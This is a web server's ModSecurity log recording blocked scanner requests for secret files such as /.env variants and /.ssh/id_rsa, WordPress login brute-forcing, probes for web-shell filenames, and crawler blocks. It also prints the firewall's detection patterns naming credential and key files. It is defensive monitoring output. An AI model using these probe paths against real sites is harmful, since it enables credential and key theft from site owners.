[Tue May 26 14:51:04.828349 2026] [security2:error] [pid 648203:tid 648419] [client 195.178.110.34:39214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVmALEQDDtxJNiDrdT8PQAAANs"]
[Tue May 26 14:51:05.275704 2026] [security2:error] [pid 648203:tid 648422] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmALEQDDtxJNiDrdT8PwAAAN4"]
[Tue May 26 14:51:06.737751 2026] [security2:error] [pid 648203:tid 648448] [client 20.206.111.203:62608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/xenon1337.php"] [unique_id "ahVmArEQDDtxJNiDrdT8aQAAAPg"]
[Tue May 26 14:51:06.737903 2026] [security2:error] [pid 648203:tid 648448] [client 20.206.111.203:62608] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/xenon1337.php"] [unique_id "ahVmArEQDDtxJNiDrdT8aQAAAPg"]
[Tue May 26 14:51:07.817360 2026] [security2:error] [pid 648203:tid 648316] [remote 123.30.233.13:45572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVmA7EQDDtxJNiDrdT8jwAAqHA"]
[Tue May 26 14:51:07.900570 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmA7EQDDtxJNiDrdT8iAAAAJE"]
[Tue May 26 14:51:09.295215 2026] [security2:error] [pid 648203:tid 648377] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmBLEQDDtxJNiDrdT8vwAAALE"]
[Tue May 26 14:51:09.467853 2026] [security2:error] [pid 648203:tid 648372] [client 20.206.111.203:29280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/alfa403.php"] [unique_id "ahVmBbEQDDtxJNiDrdT80gAAAKw"]
[Tue May 26 14:51:09.467946 2026] [security2:error] [pid 648203:tid 648372] [client 20.206.111.203:29280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/alfa403.php"] [unique_id "ahVmBbEQDDtxJNiDrdT80gAAAKw"]
[Tue May 26 14:51:12.019266 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmB7EQDDtxJNiDrdT9CAAAAJE"]
[Tue May 26 14:51:13.345158 2026] [security2:error] [pid 648203:tid 648309] [remote 111.229.141.137:42542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9LgABAWk"]
[Tue May 26 14:51:13.600442 2026] [security2:error] [pid 648203:tid 648449] [client 20.206.111.203:64128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/test11.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9QQAAAPk"]
[Tue May 26 14:51:13.600559 2026] [security2:error] [pid 648203:tid 648449] [client 20.206.111.203:64128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/test11.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9QQAAAPk"]
[Tue May 26 14:51:13.918292 2026] [security2:error] [pid 648203:tid 648378] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9OwAAALI"]
[Tue May 26 14:51:14.250520 2026] [security2:error] [pid 648203:tid 648224] [remote 178.104.164.71:33360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVmCrEQDDtxJNiDrdT9TQAAohQ"]
[Tue May 26 14:51:14.963570 2026] [security2:error] [pid 648203:tid 648449] [client 195.178.110.34:37334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/shared/config/.env"] [unique_id "ahVmCrEQDDtxJNiDrdT9dAAAAPk"]
[Tue May 26 14:51:15.315665 2026] [security2:error] [pid 648203:tid 648219] [remote 14.161.17.36:44188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVmC7EQDDtxJNiDrdT9fQAArA8"]
[Tue May 26 14:51:15.384061 2026] [security2:error] [pid 648203:tid 648443] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVmCrEQDDtxJNiDrdT9bAAAAPM"]
[Tue May 26 14:51:16.604812 2026] [security2:error] [pid 648203:tid 648231] [remote 91.227.122.219:53690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmDLEQDDtxJNiDrdT9qgABAxs"]
[Tue May 26 14:51:16.721568 2026] [security2:error] [pid 648203:tid 648449] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmDLEQDDtxJNiDrdT9pwAAAPk"]
[Tue May 26 14:51:16.723494 2026] [security2:error] [pid 648203:tid 648242] [remote 46.101.54.125:36382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVmDLEQDDtxJNiDrdT9sAAAsiY"]
[Tue May 26 14:51:18.839601 2026] [security2:error] [pid 648203:tid 648401] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmDrEQDDtxJNiDrdT9-QAAAMk"]
[Tue May 26 14:51:20.070438 2026] [security2:error] [pid 648203:tid 648427] [client 114.119.157.84:35415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/family-care-hospital-coimbatore/"] [unique_id "ahVmELEQDDtxJNiDrdT-JgAAAOM"], referer: https://www.video-bookmark.com/tag/family-care/
[Tue May 26 14:51:20.430824 2026] [security2:error] [pid 648203:tid 648225] [remote 82.223.24.195:59864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmELEQDDtxJNiDrdT-LQAAshU"]
[Tue May 26 14:51:20.564121 2026] [security2:error] [pid 648203:tid 648459] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmELEQDDtxJNiDrdT-KwAAAQM"]
[Tue May 26 14:51:20.768589 2026] [security2:error] [pid 648203:tid 648445] [client 95.182.125.184:38741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVmELEQDDtxJNiDrdT-NAAAAPU"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 14:51:20.880442 2026] [security2:error] [pid 648203:tid 648429] [client 85.208.96.206:63252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVmELEQDDtxJNiDrdT-OwAAAOU"]
[Tue May 26 14:51:20.880572 2026] [security2:error] [pid 648203:tid 648429] [client 85.208.96.206:63252] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVmELEQDDtxJNiDrdT-OwAAAOU"]
[Tue May 26 14:51:20.931397 2026] [security2:error] [pid 648203:tid 648433] [client 195.178.110.34:37342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/shared/config/.env"] [unique_id "ahVmELEQDDtxJNiDrdT-PAAAAOk"]
[Tue May 26 14:51:21.093896 2026] [security2:error] [pid 648203:tid 648457] [client 195.178.110.34:37342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/shared/.env"] [unique_id "ahVmEbEQDDtxJNiDrdT-PgAAAQE"]
[Tue May 26 14:51:21.847737 2026] [http2:info] [pid 658374:tid 658374] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:51:24.124912 2026] [security2:error] [pid 658374:tid 658584] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmE51Mb7_aby-E0KcYngAAAFA"]
[Tue May 26 14:51:25.557281 2026] [security2:error] [pid 658374:tid 658522] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmFZ1Mb7_aby-E0KcYwAAAABI"]
[Tue May 26 14:51:25.999777 2026] [security2:error] [pid 658374:tid 658475] [remote 5.42.158.148:46188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmFZ1Mb7_aby-E0KcYzQAAHWQ"]
[Tue May 26 14:51:26.165304 2026] [security2:error] [pid 658374:tid 658526] [client 47.128.63.161:35974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahVmFp1Mb7_aby-E0KcY1AAAABY"]
[Tue May 26 14:51:27.736119 2026] [security2:error] [pid 658374:tid 658587] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmF51Mb7_aby-E0KcY8gAAAFM"]
[Tue May 26 14:51:27.850998 2026] [security2:error] [pid 658374:tid 658598] [client 14.161.115.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmF51Mb7_aby-E0KcY_AAAAF4"]
[Tue May 26 14:51:28.230796 2026] [security2:error] [pid 658374:tid 658594] [client 213.232.121.110:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVmFp1Mb7_aby-E0KcY1wAAAFo"]
[Tue May 26 14:51:28.242874 2026] [security2:error] [pid 658374:tid 658593] [client 213.232.121.110:62205] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahVmFp1Mb7_aby-E0KcY1QAAAFk"]
[Tue May 26 14:51:29.494432 2026] [security2:error] [pid 658374:tid 658584] [client 85.121.127.3:43898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/api/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZOwAAAFA"]
[Tue May 26 14:51:29.511095 2026] [security2:error] [pid 658374:tid 658587] [client 85.121.127.3:43890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env.old"] [unique_id "ahVmGZ1Mb7_aby-E0KcZPAAAAFM"]
[Tue May 26 14:51:29.513290 2026] [security2:error] [pid 658374:tid 658535] [client 85.121.127.3:43904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/app/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZRAAAAB8"]
[Tue May 26 14:51:29.513357 2026] [security2:error] [pid 658374:tid 658583] [client 85.121.127.3:43902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/backend/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZRQAAAE8"]
[Tue May 26 14:51:29.517354 2026] [security2:error] [pid 658374:tid 658628] [client 85.121.127.3:43886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVmGZ1Mb7_aby-E0KcZSgAAAHw"]
[Tue May 26 14:51:29.534270 2026] [security2:error] [pid 658374:tid 658600] [client 85.121.127.3:43906] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/public/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZXgAAAGA"]
[Tue May 26 14:51:29.534258 2026] [security2:error] [pid 658374:tid 658559] [client 85.121.127.3:43910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmGZ1Mb7_aby-E0KcZTgAAADc"]
[Tue May 26 14:51:29.536665 2026] [security2:error] [pid 658374:tid 658509] [client 85.121.127.3:43884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env.backup"] [unique_id "ahVmGZ1Mb7_aby-E0KcZVwAAAAU"]
[Tue May 26 14:51:29.545195 2026] [security2:error] [pid 658374:tid 658523] [client 85.121.127.3:44030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmGZ1Mb7_aby-E0KcZYAAAABM"]
[Tue May 26 14:51:29.548041 2026] [security2:error] [pid 658374:tid 658577] [client 85.121.127.3:43874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZYwAAAEk"]
[Tue May 26 14:51:30.091499 2026] [security2:error] [pid 658374:tid 658533] [client 213.35.106.232:65170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVmGZ1Mb7_aby-E0KcZcQAAAB0"]
[Tue May 26 14:51:30.180164 2026] [security2:error] [pid 658374:tid 658546] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmGZ1Mb7_aby-E0KcZZwAAACo"]
[Tue May 26 14:51:31.523739 2026] [security2:error] [pid 658374:tid 658546] [client 213.35.106.232:65328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVmG51Mb7_aby-E0KcZoAAAACo"]
[Tue May 26 14:51:32.387037 2026] [security2:error] [pid 658374:tid 658507] [client 213.35.106.232:49178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahVmHJ1Mb7_aby-E0KcZtgAAAAM"]
[Tue May 26 14:51:32.410211 2026] [security2:error] [pid 658374:tid 658554] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmG51Mb7_aby-E0KcZrAAAADI"]
